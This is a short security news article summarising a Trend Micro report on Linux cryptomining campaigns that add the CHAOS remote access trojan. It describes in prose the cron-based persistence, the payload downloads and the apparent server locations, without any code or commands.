Threat actors have been observed using the CHAOS Remote Administrative Tool, an advanced remote access trojan (RAT), to enhance the scope of their operations. Trend Micro, a multinational American-Japanese cyber security software company, explained how it discovered the malware in a recent blog post.
Even though the threat actors were different, the team discovered that the routines and chain of events were fairly similar. the initial phase saw attackers attempting to eliminate competing malware, security products, and other cloud middleware. This was followed by persistence and payload execution routines, which were typically a Monero (XMR) cryptocurrency miner. They also observed capabilities that allowed more sophisticated threats to spread to more devices.
However, in November 2022, they intercepted a threat with a slightly different routine and incorporated the CHAOS Remote Administrative Tool (Trojan.Linux.CHAOSRAT), which is based on an open-source project.
Trend Micro observed that the original flow of terminating competing malware, such as Kinsing and killing resources that influence cryptocurrency mining performance remained unaltered.
The malware achieves persistence by modifying the /etc/crontab file, a UNIX task scheduler that, in this case, downloads itself from Pastebin every 10 minutes. Following that, additional payloads are downloaded. The main downloader script and additional payloads are hosted in different locations to keep the campaign active and spreading.
According to the report, the main server appears to be in Russia, while the command-and-control (C&C) server, which is only used to provide payloads, is most likely in Hong Kong.
On the surface, the incorporation of a RAT into the infection routine of a cryptocurrency mining malware might seem relatively minor. However, given the tool’s array of functions and the fact that this evolution shows that cloud-based threat actors are still evolving their campaigns, it is important that both organizations and individuals stay extra vigilant when it comes to security. the report added.